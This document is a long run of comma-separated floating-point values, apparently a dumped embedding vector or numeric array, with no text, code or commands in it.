0.04819497838616371, 0.016907108947634697, -0.005400259047746658, 0.0024273137096315622, 0.03279769793152809, 0.020106155425310135, -0.06021382287144661, -0.023828409612178802, -0.026459401473402977, 0.01710144430398941, -0.033664729446172714, 0.009948436170816422, -0.016638031229376793, 0.013267072848975658, 0.015830794349312782, -0.007545413915067911, 0.0260707326233387, 0.005448842886835337, -0.0017761059571057558, 0.005901044234633446, -0.018760761246085167, -0.011405945755541325, -0.038837019354104996, -0.023649023845791817, 0.01488901861011982, -0.013252124190330505, -0.03671428933739662, -0.005493689328432083, -0.02480008266866207, -0.03154199942946434, -0.015180520713329315, -0.0524105429649353, -0.02252786234021187, -0.02487482689321041, 0.01092010922729969, 0.03339565172791481, 0.00012064160546287894, 0.011174238286912441, -0.04998883605003357, -0.018999943509697914, -0.016099873930215836, -0.008169527165591717, -0.019224174320697784, 0.0010062421206384897, 0.006648485083132982, 0.007825704291462898, 0.021974757313728333, -0.01592048816382885, 0.00308319297619164, -0.0029449164867401123, 0.008461029268801212, 0.002072279341518879, -0.004918159916996956, -0.014522773213684559, 0.0025431669782847166, 0.021974757313728333, -0.00881232600659132, -0.030615171417593956, 0.022497965022921562, 0.008304066024720669, -0.005669337697327137, -0.02532329224050045, -0.007545413915067911, 0.00039193921838887036, 0.054772455245256424, -0.009051507338881493, 0.01651844009757042, -0.03378431871533394, 0.00433141877874732, 0.006996044889092445, 0.00720159150660038, 0.004880787804722786, 0.010150245390832424, 0.00238059856928885, 0.013334342278540134, -0.00995591003447771, -0.0032401555217802525, 0.019896872341632843, 0.0032158636022359133, 0.010247412137687206, -0.0406009815633297, -0.010367002338171005, 0.023948000743985176, 0.0013444590149447322, -0.03635551780462265, 0.011017275974154472, -0.04783620685338974, 0.030794557183980942, -0.01867106929421425, 0.00005740111009799875, -0.015561715699732304, 0.018641171976923943, 0.016055027022957802, 0.005852460861206055, 0.013655741699039936, -0.003692357102409005, -0.017863832414150238, -0.013199803419411182, -0.022991277277469635, -0.01562151126563549, -0.006928775459527969, 0.015576664358377457, 0.01822260394692421, -0.03486063331365585, -0.02281189151108265, 0.024246977642178535, 0.0031635428313165903, -0.0075753116980195045, 0.015240316279232502, -0.01882055774331093, -0.00899918656796217, -0.015307585708796978, 0.011809563264250755, -0.0013136271154507995, -0.018790660426020622, 0.007313707377761602, -0.007246437948197126, 0.030420837923884392, -0.026175374165177345, -0.01166754961013794, 0.0017293909331783652, -0.03354514017701149, 0.002716947114095092, 0.032618314027786255, 0.023604176938533783, 0.00031602728995494545, 0.032618314027786255, 0.028552236035466194, -0.005467528942972422, 0.021601036190986633, 0.0009931618114933372, -0.0010081107029691339, -0.020345335826277733, -0.009096353314816952, 0.0007978929788805544, 0.0018489814829081297, 0.046102143824100494, 0.017011750489473343, -0.024994418025016785, 0.020823698490858078, -0.013349290937185287, -0.002079753903672099, -0.041587602347135544, -0.0014612466329708695, -0.007407137658447027, 0.0005647849175147712, -0.015135674737393856, 0.03390391170978546, 0.01627925969660282, 0.006506471429020166, -0.019493253901600838, 0.01704164780676365, -0.010284784249961376, -0.015950385481119156, -0.002113388618454337, 0.00679423613473773, 0.002479634480550885, -0.03919579088687897, -0.010748197324573994, 0.013969667255878448, 0.0115928053855896, 0.013169905170798302, -0.013909871689975262, -0.009141200222074986, 0.005508637987077236, -0.02200465463101864, -0.013894923031330109, -0.017968473955988884, 0.008483451791107655, 0.0056618633680045605, 0.0038268964271992445, -0.04221545159816742, 0.03133271634578705, -0.02932957373559475, -0.00027842167764902115, -0.05886843055486679, 0.00451827934011817, -0.0466402992606163, -0.010456695221364498, -0.023364996537566185, 0.028193464502692223, 0.0015201075002551079, 0.015135674737393856, 0.02095823734998703, -0.014515298418700695, 0.006181334611028433, 0.007810755632817745, -0.0007591194589622319, -0.006188808940351009, 0.012272976338863373, -0.046999070793390274, -0.03208015486598015, 0.01233277190476656, -0.016772570088505745, 0.019239123910665512, -0.03282759711146355, -0.014657312072813511, -0.013909871689975262, -0.02384335920214653, 0.004948057699948549, -0.0478661023080349, -0.02059946581721306, -0.01163017749786377, 0.022169090807437897, 0.012990519404411316, -0.01859632506966591, -0.013939769007265568, 0.009492496959865093, -0.01822260394692421, -0.002001272514462471, 0.004155770409852266, -0.03545858711004257, 0.005710447207093239, -0.011914204806089401, -0.00048209927626885474, 0.016309157013893127, 0.007788332179188728, 0.011981474235653877, 0.020539671182632446, -0.006708280649036169, -0.019866975024342537, -0.02761046029627323, 0.008236796595156193, 0.012489734217524529, -0.0010940663050860167, -0.00479856925085187, -0.008311540819704533, 0.05934679135680199, -0.02554752305150032, 0.010935057885944843, -0.007425823714584112, 0.0007011928246356547, 0.026309913024306297, -0.01807311736047268, -0.020016461610794067, -0.025562472641468048, -0.02015100233256817, -0.002739370334893465, -0.013580997474491596, -0.007179168052971363, 0.022483017295598984, -0.030405888333916664, -0.020644312724471092, 0.01136109884828329, -0.004671504255384207, -0.01704164780676365, -0.008468503132462502, -0.03303688019514084, 0.018327245488762856, 0.02487482689321041, -0.009694306179881096, -0.017863832414150238, -0.008797377347946167, 0.031870871782302856, -0.0014173344243317842, -0.01740041933953762, 0.03844834864139557, -0.013020417653024197, -0.01852158084511757, -0.0162942074239254, -0.02155619114637375, -0.03357503563165665, -0.01073324866592884, 0.017759190872311592, -0.008857172913849354, -0.024770185351371765, -0.023275304585695267, 0.031213125213980675, -0.015905538573861122, 0.019388612359762192, 0.010352053679525852, -0.017893731594085693, -0.0008646954665891826, -0.0022703511640429497, -0.02753571607172489, 0.022931480780243874, 0.0015210418496280909, -0.018700966611504555, 0.010523965582251549, 0.00043164700036868453, 0.013169905170798302, -0.003916589543223381, -0.0008319949265569448, 0.021645883098244667, -0.00837133638560772, 0.011159289628267288, -0.031811077147722244, 0.001995666651055217, -0.03644520789384842, -0.006155174225568771, 0.026683634147047997, 0.007534202188253403, 0.015292637050151825, -0.03441217169165611, 0.03438227251172066, 0.01237014401704073, -0.019941717386245728, 0.0282084122300148, 0.004264149349182844, -0.008042462170124054, -0.004649081267416477, -0.02427687495946884, 0.017564857378602028, 0.023080969229340553, -0.011009802110493183, 0.006928775459527969, -0.023290252313017845, -0.021302061155438423, -0.04272371158003807, -0.004514541942626238, 0.04472685232758522, 0.024785134941339493, 0.0006208429695107043, -0.007280072662979364, 0.02628001570701599, 0.016114821657538414, -0.018700966611504555, -0.00308319297619164, -0.03324616327881813, 0.004862101748585701, 0.043142277747392654, -0.020464926958084106, -0.02361912652850151, 0.04152780771255493, -0.03865763545036316, -0.00877495389431715, 0.04015251621603966, 0.02651919610798359, -0.026997558772563934, 0.003088798839598894, -0.010516490787267685, 0.0021937384735792875, 0.015486971475183964, 0.012011372484266758, -0.004241725895553827, -0.00944017618894577, 0.015681305900216103, 0.009612087160348892, -0.0019489516271278262, -0.000009861253602139186, 0.00932805985212326, 0.006143962498754263, 0.0005367558915168047, -0.04433818161487579, 0.012870929203927517, -0.04948057606816292, -0.01563645899295807, 0.023424791172146797, 0.058988019824028015, 0.009724203497171402, 0.010284784249961376, -0.00024291823501698673, -0.006147699896246195, 0.030241452157497406, -0.019149431958794594, 0.0009006660548038781, 0.020240694284439087, -0.01363331824541092, 0.013917346484959126, -0.013954718597233295, 0.02747592143714428, -0.014604991301894188, 0.01599523052573204, 0.006155174225568771, -0.009940961375832558, -0.02687796764075756, -0.012347720563411713, 0.026623837649822235, 0.0019115796312689781, -0.030914148315787315, 0.022258784621953964, 0.005572170484811068, -0.02689291723072529, 0.008520823903381824, 0.0017237851861864328, 0.04678978770971298, 0.002608568174764514, 0.03148220479488373, -0.01029225904494524, 0.006510208826512098, 0.005138654727488756, 0.020853595808148384, 0.015606562606990337, -0.0408700592815876, -0.004103449638932943, -0.003950224258005619, 0.011914204806089401, 0.017609702423214912, 0.0015472022350877523, -0.006547580473124981, 0.0068017104640603065, 0.020539671182632446, -0.011166764423251152, -0.02629496529698372, -0.01158533152192831, -0.022408273071050644, -0.0030589010566473007, -0.018910249695181847, -0.025577422231435776, -0.03288739174604416, -0.033276062458753586, 0.006883929017931223, -0.003486810950562358, -0.01399208977818489, 0.021795371547341347, 0.0927424430847168, 0.007885499857366085, 0.006356983445584774, -0.00006002883310429752, -0.01244488824158907, 0.012228130362927914, 0.02080874890089035, 0.001598588889464736, 0.010322156362235546, 0.004992904141545296, 0.020554618909955025, 0.03940507397055626, 0.011959051713347435, 0.005351675674319267, 0.013341817073523998, -0.005889832973480225, -0.006697068922221661, -0.009208469651639462, 0.009126251563429832, -0.0006129014072939754, 0.02251291461288929, 0.0038680057041347027, -0.004955532029271126, -0.00818447582423687, 0.01627925969660282, 0.006360720377415419, -0.014941340312361717, -0.03234923258423805, -0.0012893351959064603, 0.014634889550507069, 0.003116827690973878, -0.016981853172183037, -0.012870929203927517, -0.021047931164503098, -0.012669119983911514, 0.021675780415534973, 0.02880636602640152, 0.027042405679821968, -0.011809563264250755, -0.021137623116374016, -0.008939391002058983, 0.002113388618454337, -0.007040891330689192, 0.022453119978308678, 0.000011788249139499385, -0.002660888945683837, 0.0095223942771554, 0.01229539979249239, -0.029583703726530075, -0.0059608398005366325, -0.020479876548051834, -0.007571574300527573, -0.013924820348620415, 0.022453119978308678, -0.028701722621917725, -0.011525535956025124, -0.01080799289047718, 0.004320207517594099, 0.013192328624427319, 0.020405132323503494, -0.007377239875495434, 0.018416939303278923, -0.02533823996782303, 0.0011706789955496788, -0.005949628073722124, -0.01559161301702261, -0.01732567511498928, -0.0026534146163612604, -0.024486158043146133, -0.005209662020206451, -0.0068540312349796295, 0.004891999531537294, 0.0032943449914455414, 0.004510804545134306, -0.0018060036236420274, 0.013394137844443321, 0.0034830737859010696, 0.019642742350697517, -0.030301246792078018, -0.015045981854200363, -0.009432701393961906, -0.01747516356408596, 0.021047931164503098, 0.01402946189045906, -0.003178491722792387, 0.01814785972237587, -0.026160424575209618, -0.011278880760073662, 0.008931916207075119, -0.015337483957409859, -0.022169090807437897, -0.003070112783461809, 0.0021956071723252535, -0.010972429998219013, 0.0244413111358881, 0.021197419613599777, 0.02636970765888691, 0.010344579815864563, -0.010583760216832161, -0.013984615914523602, -0.011323726736009121, -0.002685180865228176, 0.00829659216105938, -0.03154199942946434, 0.002038644626736641, 0.012721440754830837, -0.014119154773652554, -0.005385310389101505, -0.0019564260728657246, -0.0051909759640693665, 0.003860531374812126, -0.022258784621953964, 0.02022574655711651, -0.03213994950056076, -0.003953961189836264, 0.004843415692448616, -0.0003571365086827427, 0.00681665912270546, -0.014582568779587746, -0.02961360104382038, -0.01069587655365467, 0.002771136350929737, -0.005415208172053099, -0.0031112220603972673, 0.007070789113640785, 0.011106968857347965, 0.03504002094268799, -0.0025057950988411903, 0.0002482904528733343, 0.011974000371992588, 0.028925955295562744, -0.004716350696980953, 0.013640793040394783, 0.009320585988461971, 0.013812704011797905, -0.0012136568548157811, 0.012699018232524395, -0.016563287004828453, -0.01433591265231371, -0.0010239938274025917, -0.01843188889324665, 0.0020143527071923018, -0.0018956965068355203, 0.010897685773670673, 0.010561337694525719, 0.006259815767407417, -0.009305637329816818, -0.028029026463627815, 0.021346906200051308, 0.00553853577002883, -0.018177758902311325, -0.022497965022921562, 0.013042840175330639, -0.007623895537108183, 0.011159289628267288, -0.017146289348602295, 0.0094028040766716, -0.00479856925085187, -0.006222444120794535, 0.00021231987921055406, -0.023080969229340553, 0.011054648086428642, 0.02539803646504879, -0.020838648080825806, -0.0028178514912724495, 0.020988134667277336, -0.01559161301702261, -0.004394951276481152, -0.01829734817147255, 0.006555055268108845, 0.022094348445534706, 0.017878782004117966, -0.001978849293664098, -0.003456913400441408, 0.02940431796014309, 0.05611784756183624, 0.009933487512171268, -0.024396464228630066, 0.000680171069689095, -0.01947830431163311, -0.0063644577749073505, -0.012414989992976189, 0.01314748264849186, -0.011637652292847633, 0.0005755293532274663, -0.003085061442106962, 0.017714345827698708, 0.000060963135183556005, -0.025726908817887306, -0.012542054988443851, 0.007825704291462898, 0.027969231829047203, -0.007967717945575714, -0.01961284503340721, 0.020823698490858078, -0.031153328716754913, 0.011226559989154339, -0.023066019639372826, 0.008498401381075382, -0.012654171325266361, -0.022767044603824615, -0.01499366108328104, 0.032618314027786255, -0.01946335658431053, 0.022976327687501907, -0.04759702458977699, -0.009141200222074986, 0.010284784249961376, 0.03970405086874962, 0.020390182733535767, -0.0005250771064311266, -0.007425823714584112, 0.01225802768021822, 0.028836263343691826, 0.010307207703590393, 0.0072389631532132626, -0.026010936126112938, -0.029807936400175095, -0.0012342114932835102, -0.015322534367442131, 0.009537343867123127, -0.018970046192407608, 0.018760761246085167, 0.008565670810639858, 0.003841845318675041, 0.011757242493331432, 0.022901583462953568, -0.024531004950404167, -0.0009455124964006245, 0.010636080987751484, 0.016922058537602425, -0.03719265013933182, 0.015008609741926193, 0.02442636340856552, -0.01080799289047718, 0.009731678292155266, -0.007668741978704929, -0.02680322341620922, 0.023439740762114525, 0.0010548257268965244, -0.006857768632471561, 0.011159289628267288, -0.017639601603150368, -0.002954259514808655, 0.011465740390121937, -0.00033494687522761524, 0.007552888244390488, 0.020554618909955025, -0.0012743864208459854, -0.008640415035188198, -0.001963900402188301, 0.03073476254940033, 0.019493253901600838, -0.015120726078748703, -0.010628607124090195, 0.005815088748931885, -0.02710220031440258, -0.012123488821089268, -0.006271027494221926, -0.04287320002913475, 0.033276062458753586, -0.008304066024720669, -0.0044323233887553215, 0.012003897689282894, -0.037372034043073654, 0.009604613296687603, -0.01813291199505329, -0.00477614626288414, -0.005717921536415815, -0.001047351281158626, -0.004338893573731184, 0.008154578506946564, -0.012557003647089005, -0.021272161975502968, -0.030615171417593956, 0.004480907227844, 0.01725093089044094, -0.007179168052971363, -0.02148144692182541, 0.01296062208712101, 0.0005988868651911616, 0.011219085194170475, -0.010038129054009914, -0.03411319479346275, 0.003856794210150838, 0.006532631814479828, -0.03423278406262398, 0.008386285044252872, -0.005725395865738392, -0.024605749174952507, 0.022901583462953568, 0.004305258393287659, 0.006641010753810406, -0.014911442063748837, 0.005949628073722124, -0.009432701393961906, -0.021526291966438293, 0.012758812867105007, 0.03022650256752968, -0.012534581124782562, -0.01725093089044094, 0.010120347142219543, 0.014747004956007004, 0.0007021271158009768, -0.013767858035862446, -0.001928397105075419, -0.01373796071857214, -0.006177597679197788, 0.009021609090268612, 0.00840870849788189, -0.008199424482882023, -0.015262739732861519, -0.026564043015241623, 0.008446079678833485, -0.00686898035928607, 0.0013715537497773767, -0.04170719161629677, 0.013603420928120613, -0.01813291199505329, 0.002802902599796653, 0.01229539979249239, 0.015561715699732304, 0.009073929861187935, -0.006446676328778267, -0.01919427700340748, 0.0023208034690469503, 0.003853056812658906, -0.005777716636657715, -0.011652600951492786, -0.01032963115721941, 0.015457074157893658, 0.010905159637331963, 0.017759190872311592, -0.019209226593375206, -0.008132155053317547, -0.0033335855696350336, 0.006207494996488094, 0.009395330213010311, 0.001431348966434598, -0.016907108947634697, -0.03324616327881813, 0.03489053249359131, -0.011966525577008724, -0.009275739081203938, 0.0018816819647327065, -0.0060841673985123634, 0.015905538573861122, -0.025502678006887436, -0.008617991581559181, 0.0035858468618243933, -0.026863019913434982, 0.002696392359212041, -0.01696690358221531, 0.020270591601729393, -0.0059982119128108025, 0.03175128251314163, -0.01069587655365467, 0.0034195412881672382, 0.014784377068281174, -0.001761157182045281, 0.0013332474045455456, -0.01606997475028038, -0.004002545028924942, -0.0005895438371226192, -0.009903589263558388, 0.004540702328085899, 0.014358336105942726, 0.00799761526286602, -0.006962410174310207, -0.020106155425310135, 0.010979903861880302, -0.003546606283634901, 0.014380759559571743, -0.014059360139071941, 0.023678921163082123, 0.00653636921197176, 0.04556398466229439, -0.006480311043560505, -0.012788711115717888, 0.025711961090564728, -0.01287840399891138, 0.0051909759640693665, -0.007280072662979364, -0.020853595808148384, 0.01828240044414997, -0.0019582947716116905, -0.0016368951182812452, -0.01919427700340748, -0.021167520433664322, 0.015427176840603352, 0.01571120321750641, 0.013909871689975262, 0.006218706723302603, 0.04643101617693901, -0.009544817730784416, -0.023514484986662865, -0.023140763863921165, -0.0021376805379986763, -0.016862262040376663, -0.00892444234341383, -0.006641010753810406, -0.02681817300617695, -0.004544439725577831, 0.021825268864631653, 0.028686774894595146, 0.002462817123159766, -0.0000021167754766793223, -0.019866975024342537, 0.0011482557747513056, -0.004593023099005222, 0.014859121292829514, 0.01402946189045906, -0.0039801220409572124, -0.00016992597375065088, -0.042394839227199554, -0.010449221357703209, 0.0191793292760849, 0.036026641726493835, 0.0016210121102631092, -0.02007625810801983, -0.013274546712636948, 0.0007357619469985366, -0.021346906200051308, -0.012758812867105007, -0.004903211258351803, 0.0024871090427041054, -0.004095975309610367, 0.009574715979397297, -0.01961284503340721, 0.02650424838066101, 0.01627925969660282, 0.016159668564796448, 0.017086494714021683, 0.007437034975737333, 0.010591235011816025, 0.005161078181117773, -0.011144340969622135, -0.004589286167174578, 0.011809563264250755, 0.006648485083132982, -0.002511400729417801, -0.00701473094522953, -0.0004529023717623204, 0.014044411480426788, -0.020763903856277466, 0.0063980924896895885, -0.014851647429168224, -0.003361614653840661, -0.02302117459475994, -0.016638031229376793, 0.01665297895669937, -0.008573144674301147, 0.005090071354061365, 0.027132097631692886, 0.00944017618894577, -0.008573144674301147, 0.003339191433042288, -0.004779883194714785, 0.014418131671845913, 0.00029920987435616553, 0.0361163355410099, -0.018775710836052895, -0.005665600765496492, -0.0051909759640693665, 0.012123488821089268, 0.002292774384841323, -0.004495855886489153, 0.005097545683383942, -0.009305637329816818, -0.023290252313017845, 0.004245463293045759, 0.004181930795311928, 0.01363331824541092, -0.014470452442765236, 0.005396522115916014, 0.005183501169085503, -0.006185072008520365, -0.006405566819012165, 0.012272976338863373, -0.005923467688262463, 0.006607376039028168, 0.02436656691133976, 0.006510208826512098, -0.010352053679525852, -0.01732567511498928, -0.004039917141199112, -0.0032924762926995754, 0.003705437295138836, -0.009193520992994308, -0.003957698587328196, -0.016428746283054352, 0.002479634480550885, -0.025577422231435776, 0.012414989992976189, 0.016010180115699768, 0.002756187692284584, -0.008169527165591717, 0.012833557091653347, 0.02266240306198597, -0.012026321142911911, -0.019747383892536163, 0.002262876834720373, 0.010150245390832424, 0.0036475106608122587, -0.0007030614069662988, -0.013536151498556137, -0.010157719254493713, 0.008132155053317547, -0.00712684728205204, -0.012190758250653744, -0.003871742868795991, 0.00810225773602724, -0.01426116842776537, -0.011944103054702282, 0.0010501542128622532, 0.013199803419411182, 0.012168334797024727, -0.016458645462989807, 0.0012557003647089005, -0.027416124939918518, 0.007713588420301676, 0.01214591134339571, 0.02207939885556698, -0.03441217169165611, -0.008446079678833485, -0.00031415867852047086, -0.00178171182051301, -0.027206841856241226, -0.010239938274025917, -0.020106155425310135, 0.0023581753484904766, 0.007167956326156855, -0.008177001029253006, -0.00040268368320539594, 0.004129610024392605, 0.002496452070772648, 0.02000151388347149, -0.007425823714584112, 0.001852718647569418, -0.00620375806465745, 0.008027513511478901, -0.024187181144952774, 0.015442125499248505, -0.011450791731476784, 0.0008039659005589783, -0.009903589263558388, 0.005157340783625841, -0.03354514017701149, -0.023888206109404564, -0.009215944446623325, 0.013289496302604675, 0.01852158084511757, -0.006289713550359011, -0.00043258132063783705, 0.011689973063766956, -0.003709174459800124, 0.0039016406517475843, 0.01107707154005766, 0.0056768120266497135, 0.015053455717861652, 0.010082975029945374, 0.018925199285149574, 0.01429106667637825, 0.009634510613977909, 0.01154795940965414, 0.03208015486598015, -0.0075603630393743515, -0.0021526291966438293, -0.002406759187579155, -0.012160860002040863, 0.0103371050208807, 0.012609324418008327, -0.006263553164899349, -0.006087904796004295, 0.01006802637130022, 0.004454746842384338, 0.002275957027450204, -0.000007518202437495347, -0.01734062470495701, 0.022781992331147194, 0.006880191620439291, 0.011405945755541325, -0.01473205629736185, -0.014560145325958729, -0.028821313753724098, -0.009283213876187801, -0.003361614653840661, -0.007945294491946697, -0.02272219769656658, -0.002475897315889597, 0.03414309024810791, 0.007332393433898687, -0.011600280180573463, 0.020390182733535767, -0.017460215836763382, -0.0030981418676674366, -0.008191950619220734, -0.0013323130551725626, -0.012564478442072868, 0.021944859996438026, 0.0011248983209952712, -0.0017050991300493479, 0.003397118067368865, 0.0072053284384310246, -0.009223418310284615, 0.0017845147522166371, 0.007601472083479166, -0.007141795940697193, 0.0072053284384310246, 0.0037147803232073784, 0.016040077432990074, -0.015815844759345055, -0.0073099699802696705, -0.021511344239115715, 0.008864646777510643, 0.006420515943318605, -0.012272976338863373, -0.0027094725519418716, 0.00005083180803922005, 0.000408990221330896, 0.009866217151284218, -0.013229700736701488, 0.017505060881376266, 0.015830794349312782, 0.001891959342174232, 0.02888110838830471, 0.0175499077886343, -0.015606562606990337, -0.01850663125514984, 0.010785569436848164, 0.0032158636022359133, -0.021152572706341743, 0.014664786867797375, -0.00025529772392474115, -0.00006067116555641405, 0.014933865517377853, -0.005471265874803066, 0.013169905170798302, -0.007803281303495169, -0.000321399507811293, -0.021197419613599777, -0.00932805985212326, 0.009761575609445572, -0.014702158980071545, -0.01018761657178402, 0.0011295698350295424, 0.009709254838526249, 0.012190758250653744, 0.020180899649858475, 0.034770943224430084, 0.00516855251044035, 0.021900013089179993, -0.018461786210536957, 0.005867409519851208, -0.004791094921529293, -0.025607319548726082, -0.00610659085214138, -0.004649081267416477, 0.012743864208459854, 0.008498401381075382, -0.004570600111037493, 0.01777414046227932, -0.026459401473402977, -0.01837209239602089, 0.009268265217542648, -0.0046976651065051556, -0.012758812867105007, 0.018850455060601234, 0.00026650933432392776, -0.009776524268090725, 0.0016228806925937533, 0.008311540819704533, -0.02775994874536991, 0.000417866074712947, -0.00877495389431715, -0.012377617880702019, 0.0037558896001428366, 0.00825922004878521, -0.0032924762926995754, 0.007044628728181124, -0.02399284765124321, 0.01961284503340721, -0.008020038716495037, 0.013887448236346245, 0.00532925222069025, -0.010643555782735348, 0.009761575609445572, 0.0039427499286830425, -0.0022086873650550842, 0.00807235948741436, -0.0010529571445658803, 0.01103969942778349, 0.009178572334349155, -0.0076986392959952354, -0.007265123538672924, -0.03530909866094589, 0.0029785512015223503, 0.0033466657623648643, -0.007833179086446762, 0.013065263628959656, -0.016548337414860725, -0.013947243802249432, 0.009193520992994308, 0.0016135376645252109, -0.005792665760964155, -0.02385830692946911, 0.021795371547341347, -0.0028047712985426188, 0.012265502475202084, -0.0006983898929320276, -0.020464926958084106, -0.003574635135009885, 0.029972372576594353, -0.007003519684076309, -0.00536662433296442, 0.024381516501307487, 0.005235822405666113, -0.0036624595522880554, 0.025891346856951714, -0.02030049078166485, -0.0023208034690469503, 0.009275739081203938, 0.0008361993241123855, -0.00837133638560772, 0.0031448567751795053, 0.01695195585489273, 0.022228887304663658, 0.002311460440978408, -0.02940431796014309, -0.003972647245973349, 0.015105776488780975, -0.005770242307335138, 0.01347635593265295, -0.006996044889092445, -0.000019518129192874767, 0.005362886935472488, 0.004507067613303661, -0.022378375753760338, -0.00414829608052969, -0.00675686402246356, 0.023962948471307755, -0.01281113363802433, -0.008289117366075516, 0.00043725280556827784, -0.002275957027450204, 0.0008217176655307412, -0.01636895164847374, -0.0013070869026705623, 0.008685261011123657, 0.01992676965892315, -0.03013680875301361, 0.02206444926559925, -0.004735036753118038, 0.005138654727488756, -0.0014042542316019535, 0.005116231739521027, -0.005867409519851208, 0.007855601608753204, 0.010710825212299824, 0.003339191433042288, 0.0026029623113572598, 0.019313868135213852, -0.0015864429296925664, 0.006214969325810671, 0.03530909866094589, 0.022483017295598984, 0.010950006544589996, 0.006342034321278334, -0.00583377480506897, -0.02487482689321041, -0.01932881772518158, 0.018192706629633904, 0.014462977647781372, 0.03000226989388466, 0.014948814176023006, -0.004129610024392605, -0.016473593190312386, -0.02118247002363205, 0.003763363929465413, -0.01429106667637825, 0.005265719722956419, -0.026758378371596336, -0.011219085194170475, 0.001654646941460669, 0.016234412789344788, 0.007392188534140587, -0.007339867763221264, -0.0039614359848201275, 0.017370522022247314, 0.008984236977994442, -0.014739531092345715, -0.022453119978308678, 0.02309591881930828, 0.007339867763221264, -0.011106968857347965, -0.010979903861880302, 0.012669119983911514, -0.00818447582423687, -0.01284103188663721, 0.00495926896110177, 0.0040287054143846035, -0.038777224719524384, -0.009612087160348892, 0.008475977927446365, 0.004548176657408476, 0.031063636764883995, 0.0017854489851742983, 0.005295617505908012, 0.0014799325726926327, -0.00271320971660316, -0.0022479279432445765, -0.0008773085428401828, -0.024381516501307487, -0.009858743287622929, 0.02429182268679142, 0.012033795937895775, -0.019269021227955818, -0.01473205629736185, 0.024560902267694473, -0.004656555596739054, -0.01814785972237587, -0.02666868455708027, 0.02376861497759819, 0.015352432616055012, 0.013341817073523998, -0.008199424482882023, 0.007040891330689192, -0.012033795937895775, -0.010740723460912704, -0.00888707023113966, -0.01910458505153656, -0.00720159150660038, 0.0003377497778274119, -0.0006306531140580773, -0.04116903617978096, -0.013693113811314106, -0.020494824275374413, -0.011189187876880169, -0.004735036753118038, -0.006409304216504097, -0.0023226719349622726, 0.007736011408269405, -0.01362584438174963, 0.005116231739521027, -0.0269527118653059, -0.001012782217003405, -0.019433459267020226, 0.0056244912557303905, -0.0020834910683333874, -0.0048359413631260395, 0.009230893105268478, -0.013341817073523998, 0.02101803384721279, 0.014859121292829514, 0.007915397174656391, 0.019642742350697517, -0.0006245801341719925, -0.0006171057466417551, -0.010023180395364761, 0.009791472926735878, 0.01606997475028038, 0.0024478682316839695, 0.0009427096229046583, 0.003469993593171239, 0.004234251566231251, -0.007287546992301941, -0.011944103054702282, 0.01026236079633236, -0.01088273711502552, -0.00024081605079118162, 0.011166764423251152, -0.005665600765496492, 0.01488901861011982, -0.001191233634017408, 0.018476733937859535, -0.0003412534133531153, -0.007160481996834278, 0.006775550078600645, -0.029299676418304443, 0.0032607100438326597, 0.025502678006887436, 0.00473877415060997, -0.024112436920404434, 0.023649023845791817, 0.006371932104229927, -0.012713966891169548, 0.00951492041349411, 0.003653116524219513, 0.007878025062382221, -0.00040618731873109937, -0.021152572706341743, 0.007952769286930561, -0.018760761246085167, 0.0052246106788516045, 0.0025226124562323093, -0.005041487514972687, -0.007082000840455294, 0.027894487604498863, 0.00999328214675188, 0.00510875741019845, 0.0006722295074723661, -0.014971237629652023, 0.02103298157453537, 0.000973541522398591, 0.010494067333638668, 0.012594375759363174, 0.01233277190476656, -0.0038979032542556524, 0.008543247357010841, 0.0028589607682079077, -0.011166764423251152, 0.021959807723760605, 0.01822260394692421, -0.005194712895900011, 0.0031672799959778786, 0.006861505564302206, -0.03345544636249542, 0.00481351837515831, 0.012474785558879375, 0.006543843541294336, 0.028014078736305237, 0.0068914033472537994, -0.00714927027001977, -0.004409900400787592, -0.0048695760779082775, 0.0016041946364566684, 0.023230457678437233, -0.005314303562045097, -0.012168334797024727, -0.004705139435827732, 0.006005686242133379, -0.002330146497115493, -0.02332014963030815, -0.006614850368350744, -0.01955304853618145, 0.018192706629633904, 0.00444353511556983, 0.003116827690973878, -0.010038129054009914, -0.003690488636493683, 0.01406683400273323, -0.013057789765298367, -0.004832204431295395, -0.016189565882086754, -0.018940147012472153, -0.014612466096878052, 0.004570600111037493, -0.0016406323993578553, 0.010284784249961376, -0.009694306179881096, -0.003991333302110434, 0.0012603718787431717, -0.037730805575847626, 0.0004475301248021424, -0.027296535670757294, 0.013827653601765633, -0.02909039333462715, 0.02702745608985424, 0.013603420928120613, -0.029434215277433395, -0.008902018889784813, 0.021750524640083313, -0.00451827934011817, 0.004335156176239252, 0.017071545124053955, -0.0014079913962632418, -0.02021079696714878, 0.009447650983929634, -0.020464926958084106, -0.019239123910665512, 0.028851211071014404, -0.012661646120250225, 0.008304066024720669, -0.004166982136666775, 0.02635475993156433, 0.019956666976213455, -0.009021609090268612, -0.005075122695416212, -0.01092758309096098, 0.013080212287604809, 0.0011080808471888304, 0.0010062421206384897, -0.011802088469266891, 0.00587114691734314, -0.0021937384735792875, 0.001525713363662362, -0.010419324040412903, 0.005957102403044701, 0.0231856107711792, -0.00862546544522047, -0.02118247002363205, -0.021795371547341347, 0.02339489385485649, -0.018088065087795258, 0.02369387075304985, -0.007466932758688927, 0.00507138529792428, -0.027431074529886246, -0.007840652950108051, -0.006641010753810406, 0.0068727172911167145, -0.0007240832201205194, 0.0010566943092271686, -0.011009802110493183, -0.03474104404449463, -0.0023189347703009844, -0.01092758309096098, -0.0018648646073415875, -0.003505497006699443, 0.008580619469285011, -0.016249360516667366, 0.00216570938937366, 0.009903589263558388, 0.015516869723796844, 0.0012089853407815099, 0.005553484428673983, -0.017818987369537354, 0.01343898382037878, -0.0005923467688262463, -0.000689046923071146, -0.00323081249371171, 0.0037558896001428366, 0.009357958100736141, 0.001157598802819848, -0.007055840454995632, -0.030824454501271248, 0.0012706492561846972, -0.032020360231399536, -0.007605209480971098, 0.01207116711884737, 0.00403617974370718, -0.005605805199593306, 0.0052582453936338425, 0.0219299104064703, 0.009843794628977776, 0.018910249695181847, 0.0011361099313944578, -0.002494583372026682, 0.0005157340783625841, 0.0037521524354815483, -0.004895736463367939, -0.029792986810207367, -0.026474351063370705, 0.009963384829461575, 0.006158911623060703, -0.017654549330472946, -0.011652600951492786, 0.0029430477879941463, 0.014776903204619884, 0.006319611333310604, -0.010404374450445175, -0.006633536424487829, -0.007108161225914955, -0.026982609182596207, -0.0006843754090368748, 0.014507824555039406, 0.015681305900216103, 0.006278501823544502, 0.0011800220236182213, 0.014320963993668556, -0.014537721872329712, -0.0175499077886343, 0.011032224632799625, -0.020270591601729393, -0.01829734817147255, 0.001414531609043479, -0.028447594493627548, 0.010165194049477577, -0.012953147292137146, -0.003712911857292056, 0.004391214344650507, 0.0149189168587327, -0.005482477601617575, 